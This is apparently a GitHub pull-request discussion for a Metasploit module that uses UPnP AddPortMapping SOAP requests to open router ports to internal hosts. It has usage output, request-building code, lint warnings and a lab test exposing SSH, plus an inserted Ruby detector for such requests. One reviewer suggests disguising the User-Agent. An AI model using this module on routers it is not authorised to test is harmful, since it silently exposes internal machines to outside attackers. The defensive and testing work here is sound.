
Add SOAP PortMapping UPnP auxiliary module #5776

Status: Closed (St0rn wants to merge 16 commits)

Conversation

St0rn (Contributor) commented Jul 26, 2015

Auxiliary module to add a port mapping to routers that allow UPnP SOAP requests.
The success status is verified by the router's response to the request (HTTP code 200).

Example output:

```text
msf> use auxiliary/upnp/soap_addportmapping
msf auxiliary(soap_addportmapping) > set CTRL_URL WANIPConn1
CTRL_URL => WANIPConn1
msf auxiliary(soap_addportmapping) > set external_port 69
external_port => 69
msf auxiliary(soap_addportmapping) > set internal_port 69
internal_port => 6
msf auxiliary(soap_addportmapping) > set internal_client 192.168.1.38
internal_client => 192.168.1.38
msf auxiliary(soap_addportmapping) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf auxiliary(soap_addportmapping) > set rport 49000
rport => 49000
msf auxiliary(soap_addportmapping) > run

[*] Sending SOAP Envelope
[+] PAT added successfully
[*] Auxiliary module execution completed
```
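The module above asks a gateway to open a port via a WANIPConnection AddPortMapping SOAP call. The same request is what a defender wants to recognise on the wire, since an unexpected mapping silently exposes an internal host. The following is an added example, not code from this PR or from Metasploit: a small Ruby detector that parses a captured HTTP request, confirms it is an AddPortMapping call against the WANIPConnection:1 service, and reports the requested mapping in the same "src:port/proto -> client:port/proto" shape the module prints on success. The argument element names (NewRemoteHost, NewExternalPort, NewProtocol, NewInternalPort, NewInternalClient, NewLeaseDuration, NewPortMappingDescription) are those of the UPnP WANIPConnection:1 service description; the sample request and the 10.4.17.236:12345 gateway address are constructed for the demonstration.

```ruby
# Added example (not code from PR #5776 or the Metasploit module): a detector a
# defender can run over captured HTTP requests (proxy log, IDS tap) to spot
# UPnP WANIPConnection AddPortMapping calls and record the mapping requested.
# Element names follow the UPnP WANIPConnection:1 service description; the
# sample request at the bottom is constructed.

WANIP_NS = 'urn:schemas-upnp-org:service:WANIPConnection:1'.freeze

# Split a raw HTTP request into [request_line, headers, body].
# Header names are lower-cased. A stray "\n\r" line terminator (as in the
# module's first SOAPAction line) is tolerated because strip removes the CR.
def parse_http_request(raw)
  head, body = raw.split(/\r?\n\r?\n/, 2)
  lines = head.to_s.split(/\r?\n/)
  request_line = lines.shift.to_s
  headers = {}
  lines.each do |line|
    name, value = line.split(':', 2)
    next if value.nil?
    headers[name.strip.downcase] = value.strip
  end
  [request_line, headers, body.to_s]
end

# Text content of one argument element in the SOAP body, or nil if absent.
# The envelope shape is fixed by the spec, so a targeted regexp is enough here;
# use an XML parser if the input is less constrained.
def soap_field(body, name)
  m = body.match(%r{<(?:\w+:)?#{name}>\s*([^<]*?)\s*</(?:\w+:)?#{name}>}i)
  m && m[1]
end

# Returns a hash describing the requested mapping, or nil when the request is
# not a WANIPConnection AddPortMapping call.
def detect_add_port_mapping(raw)
  request_line, headers, body = parse_http_request(raw)
  return nil unless request_line.start_with?('POST ')
  call = %r{<(?:\w+:)?AddPortMapping\b[^>]*#{Regexp.escape(WANIP_NS)}}i
  return nil unless body.match?(call)

  {
    control_url:     request_line.split(' ')[1],
    soap_action:     headers['soapaction'].to_s.delete('"'),
    remote_host:     soap_field(body, 'NewRemoteHost').to_s,
    external_port:   soap_field(body, 'NewExternalPort').to_i,
    protocol:        soap_field(body, 'NewProtocol').to_s.upcase,
    internal_port:   soap_field(body, 'NewInternalPort').to_i,
    internal_client: soap_field(body, 'NewInternalClient').to_s,
    lease_seconds:   soap_field(body, 'NewLeaseDuration').to_i,
    description:     soap_field(body, 'NewPortMappingDescription').to_s
  }
end

# One-line summary in the same shape as the module's success message.
def describe_mapping(m)
  src = m[:remote_host].empty? ? 'any' : m[:remote_host]
  "#{src}:#{m[:external_port]}/#{m[:protocol]} -> #{m[:internal_client]}:#{m[:internal_port]}/#{m[:protocol]}"
end

# A lease of 0 means the mapping never expires (UPnP semantics); flag it.
def permanent_mapping?(m)
  m[:lease_seconds].zero?
end

# Constructed sample: the request for a 2222 -> 22/TCP mapping on a gateway
# listening at 10.4.17.236:12345 (hypothetical lab values).
SAMPLE_BODY = <<~XML.freeze
  <?xml version="1.0"?>
  <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
  <m:AddPortMapping xmlns:m="#{WANIP_NS}">
  <NewRemoteHost></NewRemoteHost>
  <NewExternalPort>2222</NewExternalPort>
  <NewProtocol>TCP</NewProtocol>
  <NewInternalPort>22</NewInternalPort>
  <NewInternalClient>10.4.17.236</NewInternalClient>
  <NewEnabled>1</NewEnabled>
  <NewPortMappingDescription>New Port Mapping</NewPortMappingDescription>
  <NewLeaseDuration>3600</NewLeaseDuration>
  </m:AddPortMapping>
  </s:Body>
  </s:Envelope>
XML

SAMPLE_REQUEST = [
  'POST /WANIPConn1 HTTP/1.0',
  'Content-Type: text/xml;charset="utf-8"',
  "SOAPAction: \"#{WANIP_NS}#AddPortMapping\"",
  'Host: 10.4.17.236:12345',
  "Content-Length: #{SAMPLE_BODY.bytesize}",
  '',
  SAMPLE_BODY
].join("\r\n").freeze

if __FILE__ == $PROGRAM_NAME
  m = detect_add_port_mapping(SAMPLE_REQUEST)
  puts m ? "AddPortMapping seen: #{describe_mapping(m)} (lease #{m[:lease_seconds]}s)" : 'no mapping request'
end
```

Run it on the constructed request and it reports `any:2222/TCP -> 10.4.17.236:22/TCP`; feeding it any non-POST or non-AddPortMapping request returns nil. In a real deployment the hash is what you would ship to a SIEM, with `permanent_mapping?` and an internal port in a sensitive range as the obvious alert conditions.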

bcook-r7 (Contributor):

You should fix any errors from msftidy and push to this PR.

```ruby
header = "POST http://#{rhost}:#{rport}/#{ctrlurl} HTTP/1.0\r\n"
header << "Content-Type: text/xml;charset=\"utf-8\"\r\n"
header << "SOAPAction: #{soapaction}\n\r"
header << "User-Agent: SOAP AddPortMapping Metasploit Module\r\n"
```
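Review bot: the SOAPAction line is terminated with `\n\r` while every other header uses `\r\n`, so an HTTP parser sees a bare LF followed by a stray CR at the start of the next header name, and some servers will reject or misread the request. Change it to `header << "SOAPAction: #{soapaction}\r\n"`.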
Inline review comment (Contributor):

I'd leave the "User-Agent" less obvious. Like: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Inline review comment (Contributor), follow-up:

Hmmmm, on second thought, one hard-coded value is not legal. Using Rex::UserAgent.random is more appropriate.

St0rn (Contributor, Author) commented Jul 29, 2015

Thanks, I will modify it.

hdm (Contributor) commented Aug 6, 2015

Looks like mostly msftidy errors:

```text
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/msftidy.rb ---
modules/auxiliary/upnp/soap_addportmapping.rb:9 - [WARNING] Spaces at EOL
modules/auxiliary/upnp/soap_addportmapping.rb:11 - [WARNING] Spaces at EOL
modules/auxiliary/upnp/soap_addportmapping.rb:12 - [WARNING] Spaces at EOL
modules/auxiliary/upnp/soap_addportmapping.rb:35 - [WARNING] Space-Tab mixed indent: " \t content << \"<m:AddPortMapping xmlns:m=\\\"urn:schemas-upnp-org:service:WANIPConnection:1\\\">\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:36 - [WARNING] Space-Tab mixed indent: " \t content << \"<NewPortMappingDescription>New Port Mapping</NewPortMappingDescription>\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:37 - [WARNING] Space-Tab mixed indent: " \t content << \"<NewLeaseDuration>3600</NewLeaseDuration>\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:38 - [WARNING] Space-Tab mixed indent: " \t content << \"<NewInternalClient>\#{datastore['INTERNAL_CLIENT']}</NewInternalClient>\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:50 - [WARNING] Space-Tab mixed indent: " \t header = \"POST http://\#{rhost}:\#{rport}/\#{ctrlurl} HTTP/1.0\\r\\n\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:51 - [WARNING] Space-Tab mixed indent: " \t header << \"Content-Type: text/xml;charset=\\\"utf-8\\\"\\r\\n\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:52 - [WARNING] Space-Tab mixed indent: " \t header << \"SOAPAction: \#{soapaction}\\n\\r\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:53 - [WARNING] Space-Tab mixed indent: " \t header << \"User-Agent: SOAP AddPortMapping Metasploit Module\\r\\n\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:54 - [WARNING] Space-Tab mixed indent: " \t header << \"Host: \#{rhost}:\#{rport}\\r\\n\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:55 - [WARNING] Space-Tab mixed indent: " \t header << \"Content-Length: \#{contentlen}\\r\\n\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:56 - [WARNING] Space-Tab mixed indent: " \t header << \"\\r\\n\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:57 - [WARNING] Space-Tab mixed indent: " \t header << content\n"
```

@jhart-r7 jhart-r7 self-assigned this Aug 28, 2015
```ruby
##

require 'msf/core'
class Metasploit3 < Msf::Auxiliary
```
Inline review comment (Contributor):

This should really go in modules/auxiliary/admin/upnp, instead.

```ruby
)
register_options(
[
OptString.new('CTRL_URL', [ true, 'UPnP Control URL']),
```
Inline review comment (Contributor):

You should use Msf::Exploit::Remote::HttpClient for this

jhart-r7 (Contributor):

@St0rn, thanks for the contribution! I've addressed most of the feedback in St0rn#1. If that all looks good to you, you can merge it and those changes will appear here. After that we can handle the rest in this PR.

jhart-r7 (Contributor):

My testing so far, having applied St0rn#1. I've got a box running miniupnpd 1.7 with the SOAP interface bound to 12345/TCP. Confirm that the chains are ready and clear:

```text
root@miniupnpd-natpmp-1-7:~# iptables -n -L -t nat
Chain PREROUTING (policy ACCEPT)
target     prot opt source               destination
MINIUPNPD  all  --  0.0.0.0/0            10.4.17.236

Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination

Chain POSTROUTING (policy ACCEPT)
target     prot opt source               destination

Chain MINIUPNPD (1 references)
target     prot opt source               destination
```

Create a mapping:

```text
msf auxiliary(soap_addportmapping) > set RHOST 10.4.17.236
RHOST => 10.4.17.236
msf auxiliary(soap_addportmapping) > set RPORT 12345
RPORT => 12345
msf auxiliary(soap_addportmapping) > set INTERNAL_CLIENT  10.4.17.236
INTERNAL_CLIENT => 10.4.17.236
msf auxiliary(soap_addportmapping) > set EXTERNAL_PORT 2222
EXTERNAL_PORT => 2222
msf auxiliary(soap_addportmapping) > set INTERNAL_PORT 22
INTERNAL_PORT => 22
msf auxiliary(soap_addportmapping) > run

[+] 10.4.17.236:12345 successfully mapped any:2222/TCP -> 10.4.17.236:22/TCP
[*] Auxiliary module execution completed
```

Confirm it with iptables and telnet:

```text
root@miniupnpd-natpmp-1-7:~# iptables -n -L -t nat
Chain PREROUTING (policy ACCEPT)
target     prot opt source               destination
MINIUPNPD  all  --  0.0.0.0/0            10.4.17.236

Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination

Chain POSTROUTING (policy ACCEPT)
target     prot opt source               destination

Chain MINIUPNPD (1 references)
target     prot opt source               destination
DNAT       tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:2222 to:10.4.17.236:22
...
$  telnet 10.4.17.236 2222
Trying 10.4.17.236...
Connected to 10.4.17.236.
Escape character is '^]'.
SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2
```

Clean-up and enhance soap_addportmapping.rb
St0rn (Contributor, Author) commented Aug 29, 2015

@jhart-r7 thanks

```ruby
def initialize
super(
'Name' => 'UPnP AddPortMapping',
'Description' => 'UPnP AddPortMapping SOAP request',
```
Inline review comment (Contributor):

Add a better name and description.

@jhart-r7 jhart-r7 changed the title Add SOAP AddPortMapping UPnP auxiliary module Add SOAP PortMapping UPnP auxiliary module Aug 31, 2015
jhart-r7 (Contributor) commented Sep 3, 2015

@St0rn, see St0rn#2, which is likely the last of the necessary cleanup. Give it a test and land it if it works for you.

jhart-r7 (Contributor) commented Sep 9, 2015

Ping @St0rn -- you may not have seen St0rn#2 or may be busy. If you aren't able to land it in the next week or so, I may just close this and resubmit a new PR with your code + mine. Thanks!
